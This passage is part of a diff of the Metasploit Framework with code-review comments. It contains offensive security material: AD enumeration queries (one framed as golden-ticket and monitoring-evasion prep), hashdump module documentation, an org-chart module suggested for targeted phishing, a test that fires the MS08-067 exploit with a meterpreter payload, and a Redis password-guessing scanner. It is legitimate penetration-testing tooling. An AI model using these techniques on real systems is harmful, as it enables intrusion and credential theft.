+ +Search for all users who have a title, description or comment and display this information along +with their username: + +``` +select u_sAMAccountName,u_title,u_description,u_comment from ad_users where (u_title != "" or u_description != "" or u_comment != ""); +``` + +Display all stored fields for all users whose accounts are not disabled, have a password that does +not expire, have a name starting with 'Frank' and have logged on more than once. + +``` +select * from ad_users where u_ADS_UF_ACCOUNTDISABLE=0 and u_ADS_UF_DONT_EXPIRE_PASSWD=1 and u_cn LIKE 'Frank%' and u_logonCount>1; +``` + +Get the list of group RIDs that have a name which do not have the word 'admin' in them somewhere +(perhaps useful to construct a golden ticket with access to pretty much all groups except anything +with 'admin' in it), might be useful to evade a very basic form of monitoring perhaps? + +``` +select DISTINCT g_rid from ad_groups where g_sAMAccountName NOT LIKE '%admin%'; +``` + +Search for all users who are members of the 'Domain Admins' group and display their username. +Note that this will include those in nested groups. + +``` +select u_sAMAccountName from view_mapping where g_sAMAccountName = 'Domain Admins'; +``` + +Show the groups that the user 'stufus' is a member of and write the output to /tmp/groups.txt +(e.g. for usage in a different tool): + +``` +.once /tmp/groups.txt +select g_sAMAccountName from view_mapping where u_sAMAccountName = 'stufus'; +``` + +Imagine you have compromised passwords or accounts for user1, user2, user3 and user4. Show the AD +groups which, between them all, you have access to. + +``` +select DISTINCT g_sAMAccountName from view_mapping where u_sAMAccountName IN ('user1','user2','user3','user4'); +``` + +Retrieve the list of group names common to both 'user1' and 'user2' and display the group RID, +group name and group description. 
This could be useful if you were aware that both these users +are in a group that has access to a very specific resource but are in a large number of separate +other groups. + +``` +select v1.g_rid,v1.g_sAMAccountName,v1.g_description FROM view_mapping v1 INNER JOIN view_mapping v2 ON v1.g_rid = v2.g_rid where v1.u_sAMAccountName = 'user1' and v2.u_sAMAccountName = 'user2'; +``` + +Show the name, DNS hostname and OS information for each of the computers in the domain: + +``` +select c_cn,c_dNSHostName,c_operatingSystem,c_operatingSystemVersion,c_operatingSystemServicePack from ad_computers; +``` + +Display the same columns as above but only show machines in the 'Domain Controllers' OU (you can't +normally search by DN because it isn't a "real" attribute when querying through LDAP, but as it is +a normal text field in the database, you can use regular expressions and normal string matching): + +``` +select c_cn,c_dNSHostName,c_operatingSystem,c_operatingSystemVersion,c_operatingSystemServicePack from ad_computers where c_distinguishedName LIKE '%OU=Domain Controllers%'; +``` + +Show all fields for computers that have the c_ADS_UF_WORKSTATION_TRUST_ACCOUNT set to 1 (which +seems to be everything except domain controllers) on my test system: + +``` +select * from ad_computers where c_ADS_UF_WORKSTATION_TRUST_ACCOUNT = 1; +``` + +Show all fields for computers whose operating system is Windows XP, Windows 2000 or Windows 2003 +(note that you need regular expression support in SQLite): + +``` +select * from ad_computers where c_operatingSystem REGEXP '(XP|200[03])'; +``` + +...and if you don't have regular expression support: + +``` +select * from ad_computers where c_operatingSystem LIKE '%XP%' OR c_operatingSystem LIKE '%2000%' OR c_operatingSystem LIKE '%2003%'; +``` + +Search for all members of all groups who are (amongst other things) members of any group managed +by anyone whose CN starts with 'Unprivileged User' and return their username only: + +``` +select 
DISTINCT u_sAMAccountName from view_mapping where g_rid IN (select g_rid from view_mapping where g_managedBy LIKE 'CN=Unprivileged User%'); +``` + +## Scenarios + +**Group Policy Objects** + +This cannot be used to gain a complete understanding of effective permissions because it does not +analyze group policy objects. For example, a group policy may add inconspicuous groups to +privileged groups and privileged groups, such as Domain Admins, may be removed from local +administrator groups due to GPP. Therefore, this will give a reliable overview of the effective +'static' permissions but cannot be completely relied on for overall effective permissions. + +**Domain Controller interaction** + +The acquisition of domain information does involve repeated queries against the domain controllers. +However, all interaction with AD uses native functionality and has not been noted to cause +performance problems when tested. This was recently tested on a live engagement on a domain that +has just under 11,000 groups and a similar number of users. Admittedly it took about an hour to +pull down everything (as opposed to the 1 minute to replicate the LDAP database) but the final +database size was 19,255,296 bytes, so perfectly manageable. diff --git a/documentation/modules/post/windows/gather/hashdump.md b/documentation/modules/post/windows/gather/hashdump.md new file mode 100644 index 0000000000..7e284e76fa --- /dev/null +++ b/documentation/modules/post/windows/gather/hashdump.md 
@@ -0,0 +1,46 @@ +The post/gather/hashdump module functions similarly to Meterpreter's built-in hashdump command. + +Having this feature as a post module allows it to be used in different penetration testing scenarios. + + +## Vulnerable Application + +--- + +To be able to use post/gather/hash_dump, you must meet these requirements: + +* You are on a Meterpreter type session. +* The target is a Windows platform. +* It must be executed under the context of a high privilege account, such as SYSTEM. + +## Verification Steps + +--- + +Please see Overview for usage. + +## Scenarios + +--- + +**Upgrading to Meterpreter** + +To be able to use this module, a Meterpreter session is needed. To upgrade to a Meterpreter session, the easiest way is to use the post/multi/manage/shell_to_meterpreter module. Or, you can try: + +1. Use the exploit/multi/script/web_delivery module. +2. Manually generate a Meterpreter executable, upload it, and execute it. + +**High Privilege Account** + +Before using post/gather/hashdump, there is a possibility you need to escalate your privileges. + +There are a few common options to consider: + +* Using a local exploit module. Or use Local Exploit Suggester, which automatically informs you + which exploits might be suitable for the remote target. +* The getsystem command in Meterpreter. +* Stolen passwords. + +**Hashdump From Multiple Sessions** + +One major advantage of having hashdump as a post module is you can run against it multiple hosts easily. To learn how, refer to Overview for usage. diff --git a/documentation/modules/post/windows/gather/make_csv_orgchart.md b/documentation/modules/post/windows/gather/make_csv_orgchart.md new file mode 100644 index 0000000000..bd1882b99a --- /dev/null +++ b/documentation/modules/post/windows/gather/make_csv_orgchart.md 
@@ -0,0 +1,85 @@ +This module can be used to aid the generation of an organizational chart based on information +contained in Active Directory. The module itself uses ADSI to retrieve key information from AD +(manager, title, description etc) fields and then present it in a CSV file in the form: + +``` +cn,description,title,phone,department,division,e-mail,company,reports_to +``` + +The reports_to field is the only one which is generated; everything else is taken directly from AD. +The 'manager' field contains the DN of the manager assigned to that user, and this module simply +uses a regular expression to obtain the CN field of the manager. + +This can then be imported into tools like [Microsoft Visio](https://products.office.com/en-us/visio/flowchart-software) +(using the organizational chart wizard) and it will construct a visual org chart from the +information there. Although visio supports the ability to generate Org charts if it is on a domain +joined machine, but there does not seem to be a way of doing this remotely (e.g. during a +red teaming exercise). + +This should not be confused with security groups and AD managed groups; this is purely an +internal organizational hierarchy representation but could be very useful for situational awareness +or in order to construct a more plausible or targeted internal phishing exercise. + +# Options + +Option | Value +-------------------| --- +ACTIVE_USERS_ONLY | This will restrict the search for users to those whose accounts are Active. This would have the effect of excluding disabled accounts (e.g. employees who have resigned). +FILTER | Any additional LDAP filtering that is required when searching for users. +WITH_MANAGERS_ONLY | If this is TRUE, the module will only include users who have a manger set (internally, this is implemented by adding (manager=*) to the ADSI query filter). This could be useful if not everyone has a manager set, but could mean that the top executive is not included either. 
+STORE_LOOT | Store the results in a CSV file in loot. You'll almost certainly want this set to TRUE. + +# Demo + +For the purposes of this contrived example, the module has been configured to generate the CSV +reporting information for everyone with 'IT' somewhere in their common name. + +``` +msf post(make_csv_orgchart) > show options + +Module options (post/windows/gather/make_csv_orgchart): + + Name Current Setting Required Description + ---- --------------- -------- ----------- + ACTIVE_USERS_ONLY true yes Only include active users (i.e. not disabled ones) + DOMAIN no The domain to query or distinguished name (e.g. DC=test,DC=com) + FILTER cn=*IT* no Additional LDAP filter to use when searching for users + MAX_SEARCH 500 yes Maximum values to retrieve, 0 for all. + SESSION 2 yes The session to run this module on. + STORE_LOOT true yes Store the organisational chart information in CSV format in loot + WITH_MANAGERS_ONLY false no Only users with managers + +msf post(make_csv_orgchart) > run + +Users & Managers +================ + + cn description title phone department division e-mail company reports_to + -- ----------- ----- ----- ---------- -------- ------ ------- ---------- + IT Manager Deputy GOAT IT Director it.manager@goat.stu IT Director + IT Director Director of Goat IT it.director@goat.stu + IT Leader: Badger Team Leader of Blue Team Operations it.leader.badger@goat.stu IT Manager + IT Leader: Otter Team Leader: Offensive Operations it.leader.otter@goat.stu IT Manager + Oswold Otter (IT Team) Consultant oswold.otter@goat.stu IT Leader: Otter + Bertie Badger (IT Security Team) Default pass is badger123 IT Security Team Deputy bertie.badger@goat.stu IT Leader: Badger + +[*] CSV Organisational Chart Information saved to: /usr/home/s/stuart/.msf4/loot/20151221175733_stufusdev_192.0.2.140_ad.orgchart_189769.txt +[*] Post module execution completed +``` + +The contents of the CSV file are shown below: + +``` +$ cat 
/usr/home/s/stuart/.msf4/loot/20151221175733_stufusdev_192.0.2.140_ad.orgchart_189769.txt +cn,description,title,phone,department,division,e-mail,company,reports_to +"IT Manager","","Deputy GOAT IT Director","","","","it.manager@goat.stu","","IT Director" +"IT Director","","Director of Goat IT","","","","it.director@goat.stu","","" +"IT Leader: Badger","","Team Leader of Blue Team Operations","","","","it.leader.badger@goat.stu","","IT Manager" +"IT Leader: Otter","","Team Leader: Offensive Operations","","","","it.leader.otter@goat.stu","","IT Manager" +"Oswold Otter (IT Team)","","Consultant","","","","oswold.otter@goat.stu","","IT Leader: Otter" +"Bertie Badger (IT Security Team)","Default pass is badger123","IT Security Team Deputy","","","","bertie.badger@goat.stu","","IT Leader: Badger" +``` + +When this was imported into Visio with default options set, it produced the following organisational chart: + +![screenshot_orgchart](https://cloud.githubusercontent.com/assets/12296344/11937572/f5906320-a80c-11e5-8faa-6439872df362.png) diff --git a/external/zsh/_msfconsole b/external/zsh/_msfconsole index 1a012fb62c..6cf529e91b 100644 --- a/external/zsh/_msfconsole +++ b/external/zsh/_msfconsole @@ -23,7 +23,6 @@ _arguments \ {-a,--ask}"[Ask before exiting Metasploit or accept 'exit -y']" \ "-c[Load the specified configuration file]:configuration file:_files" \ - {-d,--defanged}"[Execute the console as defanged]" \ {-E,--environment}"[Specify the database environment to load from the configuration]:environment:(production development)" \ {-h,--help}"[Show help text]" \ {-L,--real-readline}"[Use the system Readline library instead of RbReadline]" \ diff --git a/features/modules/exploit/smb/ms08_067_netapi.feature b/features/modules/exploit/smb/ms08_067_netapi.feature index e23730be1c..fa6001a720 100644 --- a/features/modules/exploit/smb/ms08_067_netapi.feature +++ b/features/modules/exploit/smb/ms08_067_netapi.feature 
@@ -1,181 +1,27 @@ -@wip +@targets @db Feature: MS08-067 netapi Background: Given a directory named "home" And I cd to "home" And a mocked home directory - Given I run `msfconsole` interactively - And I wait for stdout to contain "Free Metasploit Pro trial: http://r-7.co/trymsp" - Scenario: The MS08-067 Module should have the following options - When I type "use exploit/windows/smb/ms08_067_netapi" - And I type "show options" - And I type "exit" - Then the output should contain: + Scenario: The MS08-067 should get a session with bind_tcp + Given I ready the windows targets + Given a file named "ms08-067-bind.rc" with: """ - Module options (exploit/windows/smb/ms08_067_netapi): - - Name Current Setting Required Description - ---- --------------- -------- ----------- - RHOST yes The target address - RPORT 445 yes Set the SMB service port - SMBPIPE BROWSER yes The pipe name to use (BROWSER, SRVSVC) - - - Exploit target: - - Id Name - -- ---- - 0 Automatic Targeting - + + hosts = YAML.load File.open Rails.root.join('features', 'support', 'targets.yml') + self.run_single('use exploit/windows/smb/ms08_067_netapi') + self.run_single('set payload windows/meterpreter/bind_tcp') + hosts.each do |host| + self.run_single("set RHOST #{host['ipAddress']}") + self.run_single('run -j') + sleep 1 + end + self.run_single('sessions -K') + """ - - Scenario: The MS08-067 Module should have the following advanced options - When I type "use exploit/windows/smb/ms08_067_netapi" - And I type "show advanced" - And I type "exit" - Then the output should contain: - """ - Module advanced options: - - Name : CHOST - Current Setting: - Description : The local client address - - Name : CPORT - Current Setting: - Description : The local client port - - Name : ConnectTimeout - Current Setting: 10 - Description : Maximum number of seconds to establish a TCP connection - - Name : ContextInformationFile - Current Setting: - Description : The information file that contains context information - - Name 
: DCERPC::ReadTimeout - Current Setting: 10 - Description : The number of seconds to wait for DCERPC responses - - Name : DisablePayloadHandler - Current Setting: false - Description : Disable the handler code for the selected payload - - Name : EnableContextEncoding - Current Setting: false - Description : Use transient context when encoding payloads - - Name : NTLM::SendLM - Current Setting: true - Description : Always send the LANMAN response (except when NTLMv2_session is - specified) - - Name : NTLM::SendNTLM - Current Setting: true - Description : Activate the 'Negotiate NTLM key' flag, indicating the use of - NTLM responses - - Name : NTLM::SendSPN - Current Setting: true - Description : Send an avp of type SPN in the ntlmv2 client Blob, this allow - authentification on windows Seven/2008r2 when SPN is required - - Name : NTLM::UseLMKey - Current Setting: false - Description : Activate the 'Negotiate Lan Manager Key' flag, using the LM key - when the LM response is sent - - Name : NTLM::UseNTLM2_session - Current Setting: true - Description : Activate the 'Negotiate NTLM2 key' flag, forcing the use of a - NTLMv2_session - - Name : NTLM::UseNTLMv2 - Current Setting: true - Description : Use NTLMv2 instead of NTLM2_session when 'Negotiate NTLM2' key - is true - - Name : Proxies - Current Setting: - Description : A proxy chain of format type:host:port[,type:host:port][...] 
- - Name : SMB::ChunkSize - Current Setting: 500 - Description : The chunk size for SMB segments, bigger values will increase - speed but break NT 4.0 and SMB signing - - Name : SMB::Native_LM - Current Setting: Windows 2000 5.0 - Description : The Native LM to send during authentication - - Name : SMB::Native_OS - Current Setting: Windows 2000 2195 - Description : The Native OS to send during authentication - - Name : SMB::VerifySignature - Current Setting: false - Description : Enforces client-side verification of server response signatures - - Name : SMBDirect - Current Setting: true - Description : The target port is a raw SMB service (not NetBIOS) - - Name : SMBDomain - Current Setting: . - Description : The Windows domain to use for authentication - - Name : SMBName - Current Setting: *SMBSERVER - Description : The NetBIOS hostname (required for port 139 connections) - - Name : SMBPass - Current Setting: - Description : The password for the specified username - - Name : SMBUser - Current Setting: - Description : The username to authenticate as - - Name : SSL - Current Setting: false - Description : Negotiate SSL for outgoing connections - - Name : SSLCipher - Current Setting: - Description : String for SSL cipher - "DHE-RSA-AES256-SHA" or "ADH" - - Name : SSLVerifyMode - Current Setting: PEER - Description : SSL verification method (Accepted: CLIENT_ONCE, - FAIL_IF_NO_PEER_CERT, NONE, PEER) - - Name : SSLVersion - Current Setting: SSL3 - Description : Specify the version of SSL that should be used (Accepted: SSL2, - SSL3, TLS1) - - Name : VERBOSE - Current Setting: false - Description : Enable detailed status messages - - Name : WORKSPACE - Current Setting: - Description : Specify the workspace for this module - - Name : WfsDelay - Current Setting: 0 - Description : Additional delay when waiting for a session - """ - - @targets - Scenario: Show RHOST/etc variable expansion from a config file - When I type "use exploit/windows/smb/ms08_067_netapi" - When RHOST 
is WINDOWS - And I type "set PAYLOAD windows/meterpreter/bind_tcp" - And I type "show options" - And I type "run" - And I type "exit" - And I type "exit" - Then the output should match /spider-wxp/ + When I run `msfconsole --environment test -q -r ms08-067-bind.rc -x exit` + Then the 'Mdm::Host' table contains the expected targets + \ No newline at end of file diff --git a/features/step_definitions/targets.rb b/features/step_definitions/targets.rb deleted file mode 100644 index 7c14393d0e..0000000000 --- a/features/step_definitions/targets.rb +++ /dev/null @@ -1,10 +0,0 @@ -When /^targets are loaded$/ do - config_file = File.expand_path('features/support/targets.yml') - fail "Target config file #{config_file} does not exist" unless File.exists?(config_file) - @target_config = YAML.load_file(config_file) -end - -When /^(RHOSTS?) (?:are|is) (\S+)$/ do |type, target_type| - fail "No target type #{target_type}" unless @target_config.key?(target_type) - step "I type \"set #{type} #{@target_config[target_type]}\"" -end diff --git a/features/support/hooks.rb b/features/support/hooks.rb index ff8ec3133c..0707c96444 100644 --- a/features/support/hooks.rb +++ b/features/support/hooks.rb @@ -26,4 +26,9 @@ unless Bundler.settings.without.include?(:coverage) # set environment variable so child processes will merge their coverage data with parent process's coverage data. set_env('RUBYOPT', "#{ENV['RUBYOPT']} -r#{simplecov_setup_pathname}") end + + Before('@db') do |scenario| + dbconfig = YAML::load(File.open(Metasploit::Framework::Database.configurations_pathname)) + ActiveRecord::Base.establish_connection(dbconfig["test"]) + end end diff --git a/features/support/targets.yml.example b/features/support/targets.yml.example index 75f4b9915d..0752a6cc7e 100644 --- a/features/support/targets.yml.example +++ b/features/support/targets.yml.example 
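Review bot: The resource script written by the `ms08-067-bind.rc` step iterates `hosts.each do |host|` and reads `host['ipAddress']`, but `features/support/targets.yml.example` in this same commit nests the hosts under a top-level `windows:` key and names the field `ip`. A targets.yml copied from the example would therefore not give `set RHOST` an address. Either read `hosts['windows'].each do |host|` with `host['ip']`, or change the example to the shape the script expects. `YAML.load File.open …` also leaves the file handle open; `YAML.load_file` on the same path does the same job without that.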
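Review bot: The new `Before('@db')` hook opens the database configuration with `File.open` and never closes it, and `dbconfig["test"]` is passed on without checking that the key exists. `dbconfig = YAML.load_file(Metasploit::Framework::Database.configurations_pathname)` avoids the leaked handle. `ActiveRecord::Base.establish_connection(dbconfig.fetch('test'))` would fail with a clear KeyError when the test environment is missing, instead of handing nil to `establish_connection`. The block parameter `scenario` is unused and can be dropped.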
@@ -1,2 +1,7 @@ -WINDOWS: spider-wxp.vuln.lax.rapid7.com -LINUX: spider-ubuntu.vuln.lax.rapid7.com +windows: + - + hostname: wxpsp0 + ip: 127.0.0.100 + - + hostname: wxpsp2 + ip: 127.0.0.101 diff --git a/lib/metasploit/framework/command/console.rb b/lib/metasploit/framework/command/console.rb index 797d8dcdc0..cc28346152 100644 --- a/lib/metasploit/framework/command/console.rb +++ b/lib/metasploit/framework/command/console.rb @@ -80,7 +80,6 @@ class Metasploit::Framework::Command::Console < Metasploit::Framework::Command:: driver_options['DatabaseMigrationPaths'] = options.database.migrations_paths driver_options['DatabaseYAML'] = options.database.config driver_options['DeferModuleLoads'] = options.modules.defer_loads - driver_options['Defanged'] = options.console.defanged driver_options['DisableBanner'] = options.console.quiet driver_options['DisableDatabase'] = options.database.disable driver_options['LocalOutput'] = options.console.local_output diff --git a/lib/metasploit/framework/common_engine.rb b/lib/metasploit/framework/common_engine.rb index f098144dc7..e968b0f75f 100644 --- a/lib/metasploit/framework/common_engine.rb +++ b/lib/metasploit/framework/common_engine.rb @@ -36,7 +36,7 @@ module Metasploit::Framework::CommonEngine config.paths.add 'data/meterpreter', glob: '**/ext_*' config.paths.add 'modules' - config.active_support.deprecation = :notify + config.active_support.deprecation = :stderr # # `initializer`s diff --git a/lib/metasploit/framework/login_scanner/caidao.rb b/lib/metasploit/framework/login_scanner/caidao.rb index 28eb0a7c7b..1907f96a4a 100644 --- a/lib/metasploit/framework/login_scanner/caidao.rb +++ b/lib/metasploit/framework/login_scanner/caidao.rb @@ -43,6 +43,7 @@ module Metasploit def set_sane_defaults self.method = "POST" if self.method.nil? + super end # Actually doing the login. Called by #attempt_login 
diff --git a/lib/metasploit/framework/login_scanner/redis.rb b/lib/metasploit/framework/login_scanner/redis.rb
new file mode 100644
index 0000000000..dc0d12f3b0
--- /dev/null
+++ b/lib/metasploit/framework/login_scanner/redis.rb
@@ -0,0 +1,91 @@
+require 'metasploit/framework/login_scanner/base'
+require 'metasploit/framework/login_scanner/rex_socket'
+require 'metasploit/framework/tcp/client'
+
+module Metasploit
+ module Framework
+ module LoginScanner
+
+ # This is the LoginScanner class for dealing with REDIS.
+ # It is responsible for taking a single target, and a list of credentials
+ # and attempting them. It then saves the results.
+
+ class Redis
+ include Metasploit::Framework::LoginScanner::Base
+ include Metasploit::Framework::LoginScanner::RexSocket
+ include Metasploit::Framework::Tcp::Client
+
+ DEFAULT_PORT = 6379
+ LIKELY_PORTS = [ DEFAULT_PORT ]
+ LIKELY_SERVICE_NAMES = [ 'redis' ]
+ PRIVATE_TYPES = [ :password ]
+ REALM_KEY = nil
+
+ # This method can create redis command which can be read by redis server
+ def redis_proto(command_parts)
+ return if command_parts.blank?
+ command = "*#{command_parts.length}\r\n"
+ command_parts.each do |p|
+ command << "$#{p.length}\r\n#{p}\r\n"
+ end
+ command
+ end
+
+ # This method attempts a single login with a single credential against the target
+ # @param credential [Credential] The credential object to attempt to login with
+ # @return [Metasploit::Framework::LoginScanner::Result] The LoginScanner Result object
+ def attempt_login(credential)
+ result_options = {
+ credential: credential,
+ status: Metasploit::Model::Login::Status::INCORRECT,
+ host: host,
+ port: port,
+ protocol: 'tcp',
+ service_name: 'redis'
+ }
+
+ disconnect if self.sock
+
+ begin
+ connect
+ select([sock], nil, nil, 0.4)
+
+ command = redis_proto(['AUTH', "#{credential.private}"])
+ sock.put(command)
+ result_options[:proof] = sock.get_once
+
+ # No password - ( -ERR Client sent AUTH, but no password is set\r\n )
+ # Invalid password - ( -ERR invalid password\r\n )
+ # Valid password - (+OK\r\n)
+
+ if result_options[:proof] && result_options[:proof] =~ /but no password is set/i
+ result_options[:status] = Metasploit::Model::Login::Status::NO_AUTH_REQUIRED
+ elsif result_options[:proof] && result_options[:proof] =~ /^-ERR invalid password/i
+ result_options[:status] = Metasploit::Model::Login::Status::INCORRECT
+ elsif result_options[:proof] && result_options[:proof][/^\+OK/]
+ result_options[:status] = Metasploit::Model::Login::Status::SUCCESSFUL
+ end
+
+ rescue Rex::ConnectionError, EOFError, Timeout::Error, Errno::EPIPE => e
+ result_options.merge!(
+ proof: e,
+ status: Metasploit::Model::Login::Status::UNABLE_TO_CONNECT
+ )
+ end
+ disconnect if self.sock
+ ::Metasploit::Framework::LoginScanner::Result.new(result_options)
+ end
+
+ private
+
+ # (see Base#set_sane_defaults)
+ def set_sane_defaults
+ self.connection_timeout ||= 30
+ self.port ||= DEFAULT_PORT
+ self.max_send_size ||= 0
+ self.send_delay ||= 0
+ end
+ end
+ end
+ end
+end
diff --git a/lib/metasploit/framework/login_scanner/ssh.rb b/lib/metasploit/framework/login_scanner/ssh.rb
index 069d1de5ec..cdc4bf71c9 100644
--- a/lib/metasploit/framework/login_scanner/ssh.rb
+++ b/lib/metasploit/framework/login_scanner/ssh.rb
@@ -78,7 +78,7 @@ module Metasploit opt_hash ) end - rescue ::EOFError, Net::SSH::Disconnect, Rex::ConnectionError, ::Timeout::Error => e + rescue OpenSSL::Cipher::CipherError, ::EOFError, Net::SSH::Disconnect, Rex::ConnectionError, ::Timeout::Error => e result_options.merge!(status: Metasploit::Model::Login::Status::UNABLE_TO_CONNECT, proof: e) rescue Net::SSH::Exception result_options.merge!(status: Metasploit::Model::Login::Status::INCORRECT, proof: e)
diff --git a/lib/metasploit/framework/parsed_options/console.rb b/lib/metasploit/framework/parsed_options/console.rb
index 66052a00d6..0789cf06ae 100644
--- a/lib/metasploit/framework/parsed_options/console.rb
+++ b/lib/metasploit/framework/parsed_options/console.rb
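Review bot: `redis_proto` writes `$#{p.length}` as the bulk-string length, but the Redis wire protocol counts bytes, so a credential containing multi-byte characters produces a malformed AUTH command. The line should read `command << "$#{p.bytesize}\r\n#{p}\r\n"`. In `attempt_login`, a nil or unrecognised reply from `sock.get_once` (anything other than the three cases listed in the comment) leaves the status at the initial `INCORRECT`, so a probe that got no answer is recorded as a wrong password. A trailing `else` that sets `Metasploit::Model::Login::Status::UNABLE_TO_CONNECT` would keep the stored results accurate.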
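Review bot: The context line directly under the changed rescue, `rescue Net::SSH::Exception`, binds no exception variable, so the `proof: e` in its body does not refer to that exception and is most likely nil there. Since this hunk already edits the rescue chain, `rescue Net::SSH::Exception => e` would let the INCORRECT result carry the actual error. The enclosing method starts and ends outside the hunk, so this is based on the visible lines only.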
@@ -10,7 +10,6 @@ class Metasploit::Framework::ParsedOptions::Console < Metasploit::Framework::Par options.console.commands = [] options.console.confirm_exit = false - options.console.defanged = false options.console.local_output = nil options.console.plugins = [] options.console.quiet = false @@ -40,10 +39,6 @@ class Metasploit::Framework::ParsedOptions::Console < Metasploit::Framework::Par options.console.confirm_exit = true end - option_parser.on('-d', '--defanged', 'Execute the console as defanged') do - options.console.defanged = true - end - option_parser.on('-L', '--real-readline', 'Use the system Readline library instead of RbReadline') do options.console.real_readline = true end diff --git a/lib/metasploit/framework/version.rb b/lib/metasploit/framework/version.rb index 503ca905d8..2fb8817399 100644 --- a/lib/metasploit/framework/version.rb +++ b/lib/metasploit/framework/version.rb @@ -30,7 +30,7 @@ module Metasploit end end - VERSION = "4.11.9" + VERSION = "4.11.21" MAJOR, MINOR, PATCH = VERSION.split('.').map { |x| x.to_i } PRERELEASE = 'dev' HASH = get_hash diff --git a/lib/msf/base/config.rb b/lib/msf/base/config.rb index 4878180280..ca31d16d87 100644 --- a/lib/msf/base/config.rb +++ b/lib/msf/base/config.rb @@ -27,7 +27,7 @@ class Config < Hash # @return [String] the base configuration directory def self.get_config_root - # Use MSFCFGDIR environment variable first. See feature request #5797 + # Use MSF_CFGROOT_CONFIG environment variable first. val = Rex::Compat.getenv('MSF_CFGROOT_CONFIG') if (val and File.directory?(val)) return val diff --git a/lib/msf/base/serializer/readable_text.rb b/lib/msf/base/serializer/readable_text.rb index e912cbb6f5..c4c2838cd1 100644 --- a/lib/msf/base/serializer/readable_text.rb +++ b/lib/msf/base/serializer/readable_text.rb 
@@ -400,8 +400,7 @@ class ReadableText 'Description' ]) - mod.options.sorted.each { |entry| - name, opt = entry + mod.options.sorted.each do |name, opt| val = mod.datastore[name] || opt.default next if (opt.advanced?) @@ -409,7 +408,7 @@ class ReadableText next if (missing && opt.valid?(val)) tbl << [ name, opt.display_value(val), opt.required? ? "yes" : "no", opt.desc ] - } + end return tbl.to_s end @@ -420,24 +419,23 @@ class ReadableText # @param indent [String] the indentation to use. # @return [String] the string form of the information. def self.dump_advanced_options(mod, indent = '') - output = '' - pad = indent + tbl = Rex::Ui::Text::Table.new( + 'Indent' => indent.length, + 'Columns' => + [ + 'Name', + 'Current Setting', + 'Required', + 'Description' + ]) - mod.options.sorted.each { |entry| - name, opt = entry + mod.options.sorted.each do |name, opt| + next unless opt.advanced? + val = mod.datastore[name] || opt.default + tbl << [ name, opt.display_value(val), opt.required? ? "yes" : "no", opt.desc ] + end - next if (!opt.advanced?) - - val = mod.datastore[name] || opt.default.to_s - desc = word_wrap(opt.desc, indent.length + 3) - desc = desc.slice(indent.length + 3, desc.length) - - output << pad + "Name : #{name}\n" - output << pad + "Current Setting: #{val}\n" - output << pad + "Description : #{desc}\n" - } - - return output + return tbl.to_s end # Dumps the evasion options associated with the supplied module. 
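Review bot: `dump_advanced_options` now builds the same four-column table as `dump_evasion_options` (hunk at -446), and the two differ only in the `opt.advanced?` / `opt.evasion?` filter. The table construction could live in one private helper that takes the filter as a block, as sketched below. Both methods now pass `'Indent' => indent.length`, so the `@param indent [String]` doc line should say that only the width of the string is used.

```ruby
# Builds the Name / Current Setting / Required / Description table for
# the options the given block selects.
def self.dump_filtered_options(mod, indent)
  tbl = Rex::Ui::Text::Table.new(
    'Indent'  => indent.length,
    'Columns' => ['Name', 'Current Setting', 'Required', 'Description'])

  mod.options.sorted.each do |name, opt|
    next unless yield(opt)
    val = mod.datastore[name] || opt.default
    tbl << [ name, opt.display_value(val), opt.required? ? "yes" : "no", opt.desc ]
  end

  tbl.to_s
end

def self.dump_advanced_options(mod, indent = '')
  dump_filtered_options(mod, indent, &:advanced?)
end

# … unchanged apart from the same delegation: dump_evasion_options with &:evasion? …
```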
@@ -446,25 +444,23 @@ class ReadableText # @param indent [String] the indentation to use. # @return [String] the string form of the information. def self.dump_evasion_options(mod, indent = '') - output = '' - pad = indent + tbl = Rex::Ui::Text::Table.new( + 'Indent' => indent.length, + 'Columns' => + [ + 'Name', + 'Current Setting', + 'Required', + 'Description' + ]) - mod.options.sorted.each { |entry| - name, opt = entry + mod.options.sorted.each do |name, opt| + next unless opt.evasion? + val = mod.datastore[name] || opt.default + tbl << [ name, opt.display_value(val), opt.required? ? "yes" : "no", opt.desc ] + end - next if (!opt.evasion?) - - val = mod.datastore[name] || opt.default || '' - - desc = word_wrap(opt.desc, indent.length + 3) - desc = desc.slice(indent.length + 3, desc.length) - - output << pad + "Name : #{name}\n" - output << pad + "Current Setting: #{val}\n" - output << pad + "Description : #{desc}\n" - } - - return output + return tbl.to_s end # Dumps the references associated with the supplied module. @@ -524,18 +520,18 @@ class ReadableText def self.dump_sessions(framework, opts={}) ids = (opts[:session_ids] || framework.sessions.keys).sort verbose = opts[:verbose] || false + show_extended = opts[:show_extended] || false indent = opts[:indent] || DefaultIndent col = opts[:col] || DefaultColumnWrap return dump_sessions_verbose(framework, opts) if verbose - columns = - [ - 'Id', - 'Type', - 'Information', - 'Connection' - ] + columns = [] + columns << 'Id' + columns << 'Type' + columns << 'Checkin?' if show_extended + columns << 'Information' + columns << 'Connection' tbl = Rex::Ui::Text::Table.new( 'Indent' => indent, 
@@ -551,11 +547,22 @@ class ReadableText sinfo = sinfo[0,77] + "..." end - row = [ session.sid.to_s, session.type.to_s, sinfo, session.tunnel_to_s + " (#{session.session_host})" ] - if session.respond_to? :platform - row[1] << (" " + session.platform) + row = [] + row << session.sid.to_s + row << session.type.to_s + row[-1] << (" " + session.platform) if session.respond_to?(:platform) + + if show_extended + if session.respond_to?(:last_checkin) && session.last_checkin + row << "#{(Time.now.to_i - session.last_checkin.to_i)}s ago" + else + row << '?' + end end + row << sinfo + row << session.tunnel_to_s + " (#{session.session_host})" + tbl << row } diff --git a/lib/msf/base/sessions/command_shell.rb b/lib/msf/base/sessions/command_shell.rb index d22ac17dbc..86b5ab5e68 100644 --- a/lib/msf/base/sessions/command_shell.rb +++ b/lib/msf/base/sessions/command_shell.rb @@ -216,7 +216,7 @@ class CommandShell end end - if (datastore['InitialAutoRunScript'] && datastore['InitialAutoRunScript'].empty? == false) + if datastore['InitialAutoRunScript'] && !datastore['InitialAutoRunScript'].empty? args = Shellwords.shellwords( datastore['InitialAutoRunScript'] ) print_status("Session ID #{sid} (#{tunnel_to_s}) processing InitialAutoRunScript '#{datastore['InitialAutoRunScript']}'") execute_script(args.shift, *args) diff --git a/lib/msf/base/sessions/meterpreter_options.rb b/lib/msf/base/sessions/meterpreter_options.rb index 789f25c801..b2863874e8 100644 --- a/lib/msf/base/sessions/meterpreter_options.rb +++ b/lib/msf/base/sessions/meterpreter_options.rb 
